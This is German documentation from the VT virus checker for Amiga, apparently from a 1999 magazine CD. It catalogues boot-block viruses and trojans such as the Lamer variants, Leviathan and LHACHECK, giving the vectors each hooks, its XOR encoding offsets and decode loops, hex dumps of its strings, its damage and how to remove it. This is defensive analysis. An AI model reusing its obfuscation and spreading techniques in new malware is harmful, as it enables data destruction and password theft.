home *** CD-ROM | disk | FTP | other *** search
/ Amiga Format CD 46 / Amiga Format CD46 (1999-10-20)(Future Publishing)(GB)[!][issue 1999-12].iso / -serious- / virus / vttest3 / schutz / vt.dokumente / vt.kennt_l-z < prev    next >
Text File  |  1999-09-06  |  426KB  |  9,025 lines

  1.  
  2.    VT3.16 kennt_L-Z:
  3.    =================
  4.                   (oder sollte erkennen)
  5.  
  6.    Stand: 99-08-16
  7.  
  8.    Heiner Schneegold
  9.    Am Steinert 8
  10.    97246 Eibelstadt
  11.    Deutschland
  12.    Tel. 09303/99104     (bitte nur 19.00 - 20.00 Uhr)
  13.    EMail: Heiner.Schneegold@t-online.de
  14.  
  15.  
  16.    - L.A.D.S     DoIo, KickTag, KickCheckSum, immer $7F400
  17.          versucht eine Taeuschung durch DisplayAlert beim Booten:
  18.             (Text auch im BB lesbar)
  19.                        L.A.D.S Virus Hunter
  20.                         No virus in memory
  21.                       Press any mouse button
  22.          Entgegen der Aussage findet KEIN Virustest statt, sondern das
  23.          eigene Programm wird resetfest installiert.
  24.          Vermehrung: jeder BB einer Disk OHNE Rueckfrage
  25.          bei Wert 5 in der Zaehlzelle:
  26.          veraendert x- und y-Koordinaten bei Mausbewegungen
  27.          sobald die Zaehlzelle den Wert 8 erreicht:
  28.          ein Teil des Virusprogramms wird entschluesselt mit
  29.                         eori.b #$41,(a0)+
  30.          und mit DisplayAlert ausgegeben:
  31.                   AMIGA COMPUTING Presents:
  32.                       The GREMLIN Virus
  33.              All Code (c) 1989 By Simon Rockman
  34.  
  35.          Hinweis: siehe auch MKV-Filevirus
  36.  
  37.  
  38.    - Labtec-Trojan      File
  39.          Gefunden in: NoCare27.lha
  40.          NoCare Impl-gepackt Laenge: 13556 Bytes
  41.          NoCare entpackt Laenge:     28848 Bytes
  42.          Im entpackten File ist zu lesen:
  43.            65206461 792e004c 65742773 20647562 e day..Let's dub
  44.            20746869 73206f6e 652c2074 6865204c  this one, the L
  45.            61627465 63205669 7275732c 206f6b3f abtec Virus, ok?
  46.            00733a73 74617274 75702d73 65717565 .s:startup-seque
  47.            6e636500 733a6e6f 63617265 00633a6c nce.s:nocare.c:l
  48.            6f616477 6200733a 75736572 2d737461 oadwb.s:user-sta
  49.            72747570 00733a73 74617274 75706969 rtup.s:startupii
  50.            00633a6c 68610063 3a617263 00633a7a .c:lha.c:arc.c:z
  51.            6f6f0063 3a656e64 69660073 79733a77 oo.c:endif.sys:w
  52.            62737461 72747570 2f766972 75735f63 bstartup/virus_c
  53.            6865636b 65720073 79733a77 62737461 hecker.sys:wbsta
  54.            72747570 2f766972 75737a00 633a233f rtup/virusz.c:#?
  55.            00507265 73732041 4e59204b 65792054 .Press ANY Key T
  56.            6f20476f 20426163 6b20546f 20444f53 o Go Back To DOS
  57.          Keine Vermehrung.
  58.          Keine verbogenen Vektoren
  59.          KS1.3 : Aktivierung der Zerstoerungsroutine auf A2000 68000
  60.                  Chip- und Fastmem nicht gelungen.
  61.          KS2.04: Abhaengig vom Datum (13.5.) . Das Jahr scheint keine
  62.                  Rolle zu spielen. Die Zerstoerungsroutine konnte mit
  63.                  1993 und 1994 aktiviert werden.
  64.          Ablauf: Es werden Files geloescht (Namen s.o.). Das Loeschen
  65.                  des ganzen Unterverzeichnisses C (c:#?) konnte nicht
  66.                  nachvollzogen werden. Danach wird ein Text im Cli
  67.                  ausgegeben:
  68.        Hi there! It`s probably been awhile since you`ve seen one of these
  69.        - a virus!  usw.
  70.          Wenn Sie jetzt SOFORT ein Undelete-Prg. aufrufen, werden Sie
  71.          die verlorenen Files mit grosser Wahrscheinlichkeit zurueck-
  72.          holen koennen.
  73.          VT bietet loeschen des Trojan-Files an.
  74.  
  75.    - Lame Game Virus   BB   TimeBomb V1.0 Clone  siehe unten
  76.          Text fuer DisplayAlert:
  77.            144a4553 55532120 57686174 2061206c .JESUS! What a l
  78.            616d6520 67616d65 21204920 6a757374 ame game! I just
  79.            20686164 20746f20 464f524d 41542069  had to FORMAT i
  80.            74212121 21210001 00000000 42b90007 t!!!!!......B...
  81.  
  82.    - LameBlame!    anderer Name: Taipan-LameBlame
  83.          Cool, DoIo  auch KS2.04
  84.          BB codiert mit Wert aus $DFF006
  85.          Schaeden:
  86.          Vermehrung mit BB
  87.          sobald Zaehlzelle 8 erreicht hat:
  88.          DisplayAlert: LameBlame! by Tai-Pan usw.
  89.          sonst nichts
  90.          Herkunft: Virusinstall V2.0
  91.          siehe auch: Chaos, Taipan-Chaos, CHEATER HIJACKER, POLISH,
  92.  
  93.    - Lamer-Varianten nach VT
  94.          - mit Kennung
  95.              - ABCD
  96.                 - bei $392 
  97.                   EOR-Byte an $391  
  98.                 - bei $396
  99.                    - EOR-Byte an $394    (45fa0350)   
  100.                    - EOR-Byte an $395    (45fa0351)
  101.                 - bei $3A6
  102.                   EOR-Byte an $00D
  103.                   verwendet auch ADD-Byte
  104.                 - bei $3AA
  105.                   EOR-Byte an $3A9
  106.                 - bei $3AE
  107.                   EOR-Byte an $3AD
  108.                 - bei $3F4
  109.                   EOR-Byte an $019
  110.                   verwendet auch ADD-Byte
  111.              - FEDC
  112.                 - bei $342
  113.                   EOR-Byte an $341
  114.          - ohne Kennung
  115.                 - Lamer-$362-Clist-V.
  116.                   EOR-Wort an $362       Wort, nicht mehr Byte
  117.                   ADD-Wort an $378
  118.                 - Lamer-$39a
  119.                   EOR-Wort bei $39A       Wort, nicht mehr Byte
  120.                   ADD-Wort bei $3B0      
  121.                 - Lamer-$3C2
  122.                   EOR-Wort bei $3C2       Wort, nicht mehr Byte
  123.                   ADD-Wort bei $3D4
  124.  
  125.    - Lamer-$00D-BB-Virus    
  126.          Kennung ABCD bei $3A6
  127.          EOR-Byte bei $00D und $3A5
  128.          ADD-Byte bei $3A1
  129.          fordert trackdisk.device    
  130.          FastMem ja, BeginIo, KickTag, KickCheckSum, SumKickData
  131.          Zerstoerung: schreibt Lamer! in irgendeinen Block und da 2 Bytes
  132.          uebrig bleiben am Schluss noch !!.
  133.          Im Speicher decodiert mit:
  134.                ADD.B D1,(A0)
  135.                EOR.B D0,(A0)+
  136.          Im BB ist decodiert zu lesen:   
  137.                              005420fc 4c616d65         .T .Lame
  138.            30fc7221 51c8fff4 30bc2121          0.r!Q...0.!!
  139.              ;....
  140.            fffc4e75 74726163 6b646973 6b2e6465 ..Nutrackdisk.de
  141.            76696365 00005468 65204c41 4d455220 vice..The LAMER
  142.            45787465 726d696e 61746f72 20212121 Exterminator !!!
  143.            009d0000 00ffabcd                   ........
  144.          Zerstoerter Block:
  145.            Block:    1348
  146.            4c616d65 72214c61 6d657221 4c616d65 Lamer!Lamer!Lame
  147.            72214c61 6d657221 4c616d65 72212121 r!Lamer!Lamer!La
  148.               ;......
  149.            4c616d65 72214c61 6d657221 4c616d65 Lamer!Lamer!Lame
  150.            72214c61 6d657221 4c616d65 72212121 r!Lamer!Lamer!!!
  151.          Der Block kann NICHT gerettet werden. Ein File, das diesen
  152.          Block vorher belegt hat, ist VERLOREN !
  153.  
  154.    - LAMER-$019-BB-Virus  
  155.          Kennung ABCD bei $3F4
  156.          EOR-Byte bei $019 und $3F3
  157.          ADD-Byte bei $3EF
  158.          fordert trackdisk.device
  159.          Virus-BB in Block 0 u. 1
  160.          Original-BB in Block 2 u. 3
  161.          Fastmem ja, BeginIo, KickTag, KickCheckSum, SumKickData
  162.          Zerstoerung: ein Datenblock (Test auf $8) wird mit
  163.                       AND.B D0,(A0)+ codiert .
  164.          decodiert mit:       ADD.B D1,(A0)
  165.                            EOR.B D0,(A0)+
  166.          Im BB ist decodiert zu lesen:  
  167.                                       73747261             stra
  168.            70007472 61636b64 69736b2e 64657669 p.trackdisk.devi
  169.            63650000 54686520 4c414d45 52204578 ce..The LAMER Ex
  170.            7465726d 696e6174 6f722021 2121000f terminator !!!..
  171.            00000017 abcd0000                   ........
  172.  
  173.    - LAMER-$341-BB-Virus
  174.          Kennung FEDC bei $342
  175.          EOR-Byte bei $341
  176.          fordert trackdisk.device
  177.          Zerstoerung: schreibt LAMER!
  178.          BeginIo, KickTag, KickCheckSum
  179.          decodiert mit:       EOR.B D0,(A0)+
  180.          Im BB ist decodiert zu lesen:
  181.            20fc4c41 4d4530fc 522151c8 fff430bc  .LAME0.R!Q...0.
  182.              ;....
  183.                     4e757472 61636b64 69736b2e     Nutrackdisk.
  184.            64657669 63650054 6865204c 414d4552 device.The LAMER
  185.            20457874 65726d69 6e61746f 72202121  Exterminator !!
  186.            2113fedc                            !...
  187.  
  188.    - Lamer-$362-Clist-V.
  189.          andere Namen: U.K.LamerStyle oder Lame Style U.K.
  190.          Diese Namen sind fuer mich nicht nachvollziehbar,
  191.          waehrend clist im Prg-Code vorkommt (s.u.).
  192.          Kennung: fehlt
  193.          EOR-Wort bei $362       Wort, nicht mehr Byte
  194.          ADD-Wort bei $378
  195.          fordert trackdisk.device
  196.          BeginIo, Kicktag, KickCheckSum
  197.          Vermehrung: ueber BB
  198.          Speicher fuer VirusHauptPrg wird ueber StructMemList besorgt
  199.          und !!!! mit allocabs eingetragen.  
  200.          Springt hinter das Virusteil, um sich zu decodieren.
  201.          Verwendet A1 statt A0
  202.          decodiert mit:       EOR.W D0,(A1)+        ($DFF006)
  203.                            ADD.W D1,D0
  204.          Im BB ist decodiert zu lesen: 
  205.                              65787061 6e73696f         expansio
  206.            6e207261 6d007472 61636b64 69736b2e n ram.trackdisk.
  207.            64657669 63650000 636c6973 742e6c69 device..clist.li
  208.            62726172 7900636c 69737420 33332e38 brary.clist 33.8
  209.            30202838 204f6374 20313938 36290d0a 0 (8 Oct 1986)..
  210.  
  211.  
  212.    - LAMER-$391-BB-Virus
  213.          Kennung ABCD bei $392
  214.          EOR-Byte bei $391
  215.          fordert trackdisk.device
  216.          Zerstoerung: schreibt LAMER!
  217.          FastMem ja, BeginIo, KickTag, KickCheckSum, SumKickData
  218.          decodiert mit:       EOR.B D0,(A0)+
  219.          Im BB ist decodiert zu lesen:   
  220.            00080003 661e303c 005420fc 4c414d45 ....f.0<.T .LAME
  221.            30fc5221 51c8fff4 30bc2121 137c0003 0.R!Q...0.!!.|..
  222.              ;....
  223.                     74726163 6b646973 6b2e6465     trackdisk.de
  224.            76696365 00005468 65204c41 4d455220 vice..The LAMER
  225.            45787465 726d696e 61746f72 20212121 Exterminator !!!
  226.            0009abcd                            ....
  227.  
  228.    - LAMER-$394-BB-Virus
  229.       Clone: STARCOM 4 siehe unten
  230.          Kennung ABCD bei $396
  231.          EOR-Byte bei $394     ($45fa0350)
  232.          FastMem ja, BeginIo, KickTag, KickCheckSum und SumKickData
  233.          Vermehrung: ueber BB
  234.          Zerstoerung: ueberschreibt einen Block mit 85 x LAMER! und da
  235.          zwei Bytes uebrig bleiben, dann !! . Die Blocknummer wird
  236.          mit $DFF006 ermittelt.
  237.          Speicher fuer VirusHauptPrg wird ueber SysStkLower besorgt.
  238.          zusaetzlich im Prg. noch Remove Node, Test auf Cool u. Cold .
  239.          decodiert in den Speicher mit:
  240.             EOR.B D0,(A0)+       
  241.          Im BB ist decodiert zu lesen: 
  242.            20fc4c41 4d4530fc 522151c8 fff430bc  .LAME0.R!Q...0.
  243.            2121137c                            !!.|
  244.               ;....
  245.                              74726163 6b646973         trackdis
  246.            6b2e6465 76696365 00546865 204c414d k.device.The LAM
  247.                              ^^
  248.            45522045 78746572 6d696e61 746f7220 ER Exterminator
  249.            21212100 b100abcd                   !!!.....
  250.  
  251.    - LAMER-$395-BB-Virus
  252.          Kennung ABCD bei $396
  253.          EOR-Byte bei $395     ($45fa0351)
  254.          FastMem ja, BeginIo, KickTag, KickCheckSum, SumKickData
  255.          fordert trackdisk.device
  256.          Zerstoerung: schreibt LAMER! in irgendeinen Block und da 2 Bytes
  257.          uebrig bleiben am Schluss noch !!
  258.          decodiert in den Speicher mit:
  259.             EOR.B D0,(A0)+       
  260.          Im BB ist decodiert zu lesen:      
  261.            20fc4c41 4d4530fc 522151c8 fff430bc  .LAME0.R!Q...0.
  262.            2121137c                            !!.|
  263.               ;....
  264.                              74726163 6b646973         trackdis
  265.            6b2e6465 76696365 00005468 65204c41 k.device..The LA
  266.                              ^^^^
  267.            4d455220 45787465 726d696e 61746f72 MER Exterminator
  268.            20212121 007fabcd                    !!!...
  269.  
  270.    - Lamer-39A-BB-Virus
  271.          andere Namen: Selfwriter, Pseudoselfwriter
  272.          Diese Namen sind fuer mich nicht nachvollziehbar 
  273.          Kennung: fehlt
  274.          EOR-Wort bei $39A       Wort, nicht mehr Byte
  275.          ADD-Wort bei $3B0
  276.          BeginIo, KickTag, KickCheckSum
  277.          fordert trackdisk.device
  278.          Vermehrung: ueber BB
  279.          Zerstoerung: ueberschreibt einen Block mit 85 x Lamer! und da
  280.          zwei Bytes uebrig bleiben, dann !! . Die Blocknummer wird
  281.          mit $DFF007 ermittelt.
  282.          Speicher fuer VirusHauptPrg wird ueber StructMemList besorgt
  283.          und !!!! mit allocabs eingetragen. (machen andere Lamer nicht)
  284.          Springt hinter das Virusteil, um sich zu decodieren.
  285.          Verwendet A1 statt A0
  286.          decodiert mit:       EOR.W D0,(A1)+        ($DFF006)
  287.                            ADD.W D1,D0
  288.          Im BB ist decodiert zu lesen:   
  289.            4c616d65 30fc7221 51c8fff4 30bc2121 Lame0.r!Q...0.!!
  290.               ;....
  291.                                       74726163             trac
  292.            6b646973 6b2e6465 76696365 00005468 kdisk.device..Th
  293.            65204c41 4d455220 45787465 726d696e e LAMER Extermin
  294.            61746f72 20212121 0000fe85 00000004 ator !!!........
  295.  
  296.    - LAMER-$3A9-BB-Virus
  297.          Kennung ABCD bei $3AA
  298.          EOR-Byte bei $3A9
  299.          fordert trackdisk.device
  300.          FastMem ja; BeginIo, KickTag, KickCheckSum und SumKickData
  301.          Vermehrung: ueber BB
  302.          Zerstoerung: ueberschreibt einen Block mit 85 x LAMER! und da
  303.          zwei Bytes uebrig bleiben, dann !! . Die Blocknummer wird
  304.          mit $DFF006 ermittelt..
  305.          Speicher fuer VirusHauptPrg wird ueber SysStkLower besorgt.
  306.          decodiert mit:       EOR.B D0,(A0)+     (immer neu mit $DFF007)
  307.          Im BB ist decodiert zu lesen:  
  308.                                       4c414d45             LAME
  309.            30fc5221 51c8fff4 30bc2121 137c0003 0.R!Q...0.!!.|..
  310.              ;....
  311.            61636b64 69736b2e 64657669 63650054 ackdisk.device.T
  312.            6865204c 414d4552 20457874 65726d69 he LAMER Extermi
  313.            6e61746f 72202121 2156abcd          nator !!!V..
  314.  
  315.    - LAMER-$3AD-BB-Virus  
  316.       Clone: siehe bei STARCOMReturn 
  317.          Kennung ABCD bei $3AE
  318.          EOR-Byte bei $3AD
  319.          fordert trackdisk.device
  320.          Zerstoerung: schreibt LAMER!
  321.       BeginIo, KickTag, KickCheckSum und SumKickData
  322.       Vermehrung: ueber BB
  323.       KS1.3: ja
  324.       Fastmem: nein
  325.       KS2.04: nicht gelungen
  326.       Zerstoerung: ueberschreibt einen Block mit 85 x LAMER! und da
  327.          zwei Bytes uebrig bleiben, dann !! . Die Blocknummer wird
  328.          mit $DFF006 ermittelt.
  329.       Speicher fuer VirusHauptPrg wird ueber StructMemList besorgt.
  330.          decodiert mit:       EOR.B D0,(A0)+     (immer neu mit $DFF007)
  331.          Im BB ist decodiert zu lesen:  
  332.            4c414d45 30fc5221 51c8fff4 30bc2121 LAME0.R!Q...0.!!
  333.              ;....
  334.            4e757472 61636b64 69736b2e 64657669 Nutrackdisk.devi
  335.            63650054 6865204c 414d4552 20457874 ce.The LAMER Ext
  336.            65726d69 6e61746f 72202121 218eabcd erminator !!!...  
  337.  
  338.    - Lamer-$3C2-BB-Virus
  339.          anderer Name: Rene
  340.          Dieser Name ist fuer mich nicht nachvollziehbar  
  341.          Kennung: fehlt
  342.          EOR-Wort bei $3C2       Wort, nicht mehr Byte
  343.          ADD-Wort bei $3D4
  344.          BeginIo, KickTag, KickCheckSum, SumKickData
  345.          fordert trackdisk.device
  346.          Vermehrung: ueber BB
  347.          Zerstoerung: Format alle LW
  348.          Springt hinter das Virusteil, um sich zu decodieren.
  349.          decodiert mit:       EOR.W D0,(A0)+        ($DFF006)
  350.                            ADD.W D1,D0
  351.          Im BB ist decodiert zu lesen:    
  352.                     74726163 6b646973 6b2e6465     trackdisk.de
  353.            76696365 00005468 65204c41 4d455220 vice..The LAMER
  354.            45787465 726d696e 61746f72 20212121 Exterminator !!!
  355.  
  356.    - LamerBBdefekt  BB   Empfehlung: sofort loeschen
  357.       Typ A:
  358.          Immer Guru. BB-CheckSum falsch. In eor-Schleife herumgepfuscht.  
  359.                        EOR.B D0,(A0)+
  360.                        EOR.L D2,D0       (D2 !!!!)
  361.       Typ B:
  362.          Immer GURU. Code im BB um mehrere Bytes verschoben. trackdisk.
  363.          device und LAMER am Schluss zu lesen.
  364.       Wahrscheinlich gibt noch mehr ????
  365.  
  366.    - Virusx-LAM-$3C2-Ins   haengt an VirusX  Laenge: 13192 Bytes
  367.       Wird im Speicher von VT als Lamer-$3C2 erkannt und entfernt.
  368.       Wichtig:
  369.       VirusX erkennt Lamer-$3C2 im Speicher NICHT !!!!!
  370.       Vermehrung:
  371.       NUR als Lamer-$3C2-Bootblock moeglich, NICHT als Linkfile !!!!
  372.       Deshalb in FileTest nur Loeschangebot.
  373.  
  374.    - Lamer! Exterminator-File  gepackt: 2260 Bytes (Zahl stimmt)
  375.                              ungepackt: 1824 Bytes
  376.       KS2.04: Ja
  377.       Verbogene Vektoren: siehe oben
  378.       Tarnung:
  379.       Fuehrt neben Installierung von Lameralt.BB im Speicher auch den
  380.       endcli-Befehl (KS1.3) aus. Aenderung gegenueber OrigBefehl:
  381.       process wird zu task, 2 Werte $52 werden zu $51
  382.       Vermehrung:
  383.       NUR als Lameralt-Bootblock moeglich, NICHT als Linkfile !!!!
  384.       Da jeder den endcli-Befehl in c hat (KS2.04 nicht mehr), gibt
  385.       es in FileTest nur Loeschangebot. Danach bitte von OrigWB endcli
  386.       nach c neu kopieren.
  387.       VT kennt: 16.10.92
  388.  
  389.    - LAMER-decode
  390.       Hinweis:
  391.       Es sind decodierte "Lamer"-Bootbloecke im Umlauf, bei denen Lamer
  392.       Exterminator im BB zu lesen ist. Diese BBe sind NICHT bootfaehig
  393.       da ja beim Booten die Codier-Routine ausgefuehrt wird. Es wird
  394.       dann also Codiert anstatt Decodiert.
  395.  
  396.    - Lamer-LoadWB  FileVirus Laenge: 4172 Bytes
  397.       KickTag, KickCheckSum, SumKickData, BeginIo
  398.       in SubDir c
  399.       in LoadWB sichtbar: The LAMER Exterminator !!!
  400.       Virus haengt vor dem LoadWB-Teil
  401.       Schreibt zuerst das Virusprogramm in den Speicher und fuehrt dann
  402.       den LoadWB-Befehl aus.
  403.       Kann sich nicht als LoadWb vermehren, sondern schreibt einen
  404.       Lamer-BB
  405.  
  406.    - Lamer Bomb     anderer Name: Gotcha LAMER   s.o.
  407.  
  408.    - LamerFry-Trojan    File
  409.       Laenge gepackt: 8240 Bytes
  410.       Bezeichnet sich durch Textausgabe ins Cli selbst als Test-Virus.
  411.       Aus dem Speicherauszug kann man ersehen, dass es sich um einen
  412.       Liberator5.0-Clone (Behandlung s.u.) mit geaendertem Text aber
  413.       gleichem Verhalten handelt.
  414.           722e6465 76696365 003a632f 72756e00 r.device.:c/run.
  415.           3a632f62 72003a73 2f2e696e 666f2000 :c/br.:s/.info .
  416.           3a632f00 732f7374 61727475 702d7365 :c/.s/startup-se
  417.           7175656e 63650073 2f736865 6c6c2d73 quence.s/shell-s
  418.           74617274 7570003b 4c616d65 72204672 tartup.;Lamer Fr
  419.           79202d20 53617973 20596f75 20446965 y - Says You Die
  420.           20212121 0a616c69 61732063 6f707920  !!!.alias copy
  421.           64656c65 74650a61 6c696173 2064656c delete.alias del
  422.           65746520 22656368 6f202a22 4e6f2066 ete "echo *"No f
  423.           696c6520 746f2064 656c6574 652c2063 ile to delete, c
  424.           616e2774 2066696e 642a2222 00732f2e an't find*"".s/.
  425.           696e666f 20002e66 61737464 6972a020 info ..fastdir.
  426.           00630063 2f00632f 72756e00 632f6272 .c.c/.c/run.c/br
  427.           00627220 633a000a 002e6661 73746469 .br c:....fastdi
  428.           72003a73 2f737461 72747570 2d736571 r.:s/startup-seq
  429.  
  430.    - LamerKiller    File
  431.       anderer Name: DiVa-SADDAM-Inst.
  432.       Laenge gepackt: 11512 Bytes
  433.       KS1.3 Ja
  434.       KS2.04  GURU3
  435.       Verbogene Vektoren: Cold, BeginIo usw.
  436.       Installiert SADDAM-Disk-Validator  (codiert IRAK)
  437.       Keine Meldung im Cli
  438.  
  439.    - Lame Style U.K.  siehe bei Clist-Virus
  440.    - LamerStyle U.K.  siehe bei Clist-Virus
  441.  
  442.    - Laureline-Virus   BB
  443.       Typ A immer ab $6E800
  444.       Typ B immer ab $6B500   (nicht vorhanden)
  445.       KS1.3 : ja
  446.       KS2.04: ja
  447.       Verwendet AllocMem NICHT
  448.       Fordert trackdisk.device NICHT
  449.       Verbogenen Vektoren: Cool, Warm, DoIo
  450.       BB-Teile codiert
  451.       Namensbegruendung: decodiert mit  eor.b d7,(a3)+  ist im BB zu
  452.       lesen:
  453.            00000000 00010000 000000d2 0e546865 .............The
  454.            204c6175 72656c69 6e652056 69727573  Laureline Virus
  455.            2056312e 30000100 f21e436f 64652062  V1.0.....Code b
  456.       Schaeden und Vermehrung: BB
  457.       Meldung: Mit DisplayAlert
  458.       vorher wird ueberprueft:
  459.           - rechte Maustaste
  460.           - Zaehlzelle mind #35
  461.  
  462.  
  463.    - Laurin-Virus  SADDAM-Clone  Wird von VT als SADDAM-Clone erkannt.
  464.       Blocklangwort: $a0a0a0a0
  465.       Namensbegruendung: im Speicher ist decodiert zu lesen
  466.            74726163 6B646973 6B2E6465 76696365 trackdisk.device
  467.            00010820 4C617572 696E2056 69727573 ... Laurin Virus
  468.       Behandlung: siehe bei SADDAM
  469.  
  470.  
  471.    - Lazarus    Diskname
  472.       KEIN Virus
  473.       Wird von VT NICHT erkannt.
  474.       Die Disk war defekt und wurde von einem User mit dem Commodore-
  475.       Programm diskdoctor behandelt. Bei neueren WB liegt dieses Pro-
  476.       gramm nicht mehr im C-Verzeichnis. Geruechte behaupten, die Disks
  477.       waeren danach schlimmer verwuestet als vorher. Meine Empfehlung:
  478.       Verwenden Sie disksalv2 oder ein aehnliches Programm.
  479.             Fileauszug aus diskdoctor:
  480.            726d6174 202d2053 6f727279 210a0000 rmat - Sorry!...
  481.            074c617a 61727573 30556e61 626c6520 .Lazarus0Unable
  482.            746f2077 72697465 20746f20 726f6f74 to write to root
  483.  
  484.  
  485.    - le RoLE   franz. Name fuer Return of The Lamer Exterminator  s.u.
  486.  
  487.    - LEVIATHAN-Virus  BB und File (Laenge 1056 Bytes)
  488.          Cool $7F89A  nach Reset: DoIo $7FAB4  OldOpenLib $7F8E2
  489.          KS1.3 : ja  KS2.04 : nach RESET Endlosreset (Computer ausschalten)
  490.          Fordert trackdisk.device NICHT
  491.          Namensbegruendung: im BB und im File ist zu lesen:
  492.           -=- LEVIATHAN -=-
  493.          Vermehrung und Schaeden:
  494.          Beim ersten Start des Programms wird nur Cool verbogen. Nach
  495.          einem Reset werden dann DoIo und OldOpenLib verbogen.
  496.          Vermehrung als BB:
  497.          Findet mit verbogenen DoIo statt, wenn ein lesender Zugriff
  498.          auf Block 880 (nur bei DD-Disk Rootblock) stattfindet. Das
  499.          Virusteil wird nach $7F000 kopiert und einige NOPs durch den
  500.          BB-Header ersetzt.
  501.          Abhilfe: neuen Original-BB mit VT aufkopieren.
  502.          Vermehrung als File:
  503.          Findet mit verbogenem OldOpenLib-Vektor immer auf sys: statt.
  504.          Es wird ein Test auf schon verseucht durchgefuehrt.
  505.             79007379 733a732f 73746172 7475702d y.sys:s/startup-
  506.             73657175 656e6365 00007379 733a732f sequence..sys:s/
  507.             c0000000 03f30000 00000000 00010000 ................
  508.          Die erste Zeile der s-seq wird eingefuegt:
  509.          startup-sequence Original:
  510.             636c730a 0a000000 00000000 00000000 cls.............
  511.          startup-sequence verseucht:
  512.             732fc00a 636c730a 0a000000 00000000 s/..cls.........
  513.          Das Virusprogramm selbst wird nach s mit Namen $C0 kopiert
  514.          (siehe oben). Laenge des Virusfiles 1056 Bytes. Der File-
  515.          name ist als Sonderbuchstabe A sichtbar.
  516.          Abhilfe: Loeschen Sie mit VT das Virusfile in s .
  517.                   Vergessen Sie bitte nicht mit einem Editor, die
  518.                   erste Zeile in der Startup-Sequence zu loeschen.
  519.          Allgemein:
  520.          Sowohl mit dem BB als auch mit dem File waren BEIDE Ver-
  521.          seuchungstypen zu erreichen.
  522.          Im Virus steckt noch ein codierter Text, der NIE erreicht
  523.          wird:
  524.             005e4611 0a190027 51c8fff8 594f5520 .^F....'Q...YOU
  525.             41524520 54484520 4f574e45 52204f46 ARE THE OWNER OF
  526.             2041204e 45572047 454e4552 4154494f  A NEW GENERATIO
  527.             4e204f46 20564952 55532120 49542046 N OF VIRUS! IT F
  528.             55434b53 20594f55 52205354 41525455 UCKS YOUR STARTU
  529.             502d5345 5155454e 43452120 48415645 P-SEQUENCE! HAVE
  530.             2046554e 2e2e2e2e 20000000           FUN.... ...
  531.  
  532.    - LHA3.0-Trojan  siehe bei CoP-Trojan
  533.  
  534.    - LHACHECK-BBS-Trojan     Laenge ungepackt: 3836 Bytes
  535.          Einbruchswerkzeug   Keine verbogenen Vektoren
  536.          Keine Vermehrung
  537.          Soll nach Text im File (usage):
  538.              - defekte Lha-Archive erkennen und loeschen
  539.              - BBS-Adverts anhaengen oder loeschen
  540.          Im File ist weiter zu lesen:
  541.             00322456 45523a20 4c484143 4845434b .2$VER: LHACHECK
  542.             20312e31 20283139 2e30322e 39342920  1.1 (19.02.94)
  543.             62792042 6c616465 2f4e6f43 7261636b by Blade/NoCrack
  544.                ;......
  545.             0000474f 442d4642 54522e4c 48410000 ..GOD-FBTR.LHA..
  546.          Decodiert mit  eor.l d0,(a0)+  kann man dann aber auch noch
  547.          lesen:
  548.             536e6f6f 70446f73 0052414d 3a4d312e SnoopDos.RAM:M1.
  549.             44415800 4242533a 55534552 2e444154 DAX.BBS:USER.DAT
  550.             41000000 00000000 00000000 00000000 A...............
  551.          Das Trojan-Teil startet nicht, falls SnoopDos gefunden wird.
  552.          Es wird dann nur der LHACHECK-Teil ausgefuehrt.
  553.          VT bietet Loeschen an.
  554.          Ein Ausbau ist nicht moeglich, da das Trojan-Teil eingearbeitet
  555.          ist. Besorgen Sie sich bitte das Original-LHACHECK-File, falls
  556.          es das Teil gibt.
  557.  
  558.    - LHAV3-BBS-Trojan   File
  559.          Verlaengert ein File um #848 Bytes
  560.          Keine verbogenen Vektoren
  561.          Keine Vermehrungsroutine
  562.          VT erkennt BBS-Virus
  563.          vgl. auch 1.Hunk bei Viewtek22-Installer. Da ist das Teil
  564.          ein paar Bytes laenger.
  565.          Vermutlich ein Angriff auf FastCall mit bestimmten Files s.u. .
  566.          VT bietet Ausbau an.
  567.          Das LHA-Programm meldet sich bei mir im Cli mit V 3.035 1994 .
  568.          Nach meinem Wissensstand gibt es im Sept. 94 noch gar kein
  569.          LHA-Version 3 .
  570.                 Auszug aus dem 1.Hunk (ist uncodiert zu lesen):
  571.               6c696272 61727900 533a4861 75707450 library.S:HauptP
  572.               66616400 55736572 2f537973 4f702f55 fad.User/SysOp/U
  573.               73657244 6174656e 00426f78 44617465 serDaten.BoxDate
  574.               6e2f426f 78506172 616d6574 65720055 n/BoxParameter.U
  575.               7365722f 536e6f6f 70792f2e 494e4445 ser/Snoopy/.INDE
  576.               58005573 65722f53 6e6f6f70 792f2e54 X.User/Snoopy/.T
  577.               58540041 6273656e 64657220 203a2053 XT.Absender  : S
  578.               6e6f6f70 790a4265 74726566 66202020 noopy.Betreff
  579.          Hinweis eines Anwenders (Juli 95) : Danke
  580.          Aufgrund  des  vorliegenden  Textes, kann man davon ausgehen, dass
  581.          das Programm folgendes macht:
  582.          Öffnen von S:Hauptpfad
  583.          Lesen der ersten Zeile (Pfad von Fastcall).
  584.          Öffnen der Userdaten vom Sysop und auslesen der Sysoppsw.
  585.          Öffnen der Boxdaten und auslesen des DOS-Passwortes.
  586.          Öffnet beim User Snoopy das File .index (Offsetdaten fuer Briefe)
  587.          und fuegt einen neuen Brief ein.
  588.          Öffnen des Files .txt (Der Brief selber) und hineinschreiben des
  589.          Passwortes fuer den Sysop und des DOS-Passwortes.
  590.  
  591.  
  592.    - Liberator virus v1.21  anderer Name: MemCheck s.u.
  593.  
  594.    - Liberator Virus V3.0  Laenge: ungepackt 10712 (ich hab nur die un-
  595.          gepackte Version, deshalb erkennt VT auch nur das ungepackte
  596.          File !!!)
  597.          Namensbegruendung: s.u.
  598.          KS2.04: JA    68030: JA
  599.          bleibt NICHT im Speicher nach Aenderung von .fastdir .
  600.          Richtiger Name fuer das File: cv
  601.          Versucht durch Cli-Ausgabe zu taeuschen:
  602. Check Vectors rev 5.1  All Rights Reserved  more TUPperware © by Mike Hansell
  603. Reset vectors ok, Nothing resident, Trackdisk.device not intercepted,
  604. DoIO ok, VBlank ok, dos.library not intercepted.
  605. System appears to be free of viruses and trojans!
  606.  
  607.          Legt in Wirklichkeit .fastdir an (bei mir auf 3 SCSI-HD in einem
  608.          Durchlauf). Laenge: 2/3 Bytes . Startwert auf allen Festplatten
  609.          in .fastdir  $310a = 1 Return  . Hinweis: .fastdir hat danach im
  610.          Namen noch 2 leerzeichen ($20)  Auszug aus FileheaderBlock:
  611.                   0         0         0 ............
  612.                13f1       3d5       484 ............
  613.             a2e6661  73746469  72202000 ..fastdir  .
  614.                   0         0         0 ............
  615.  
  616.  
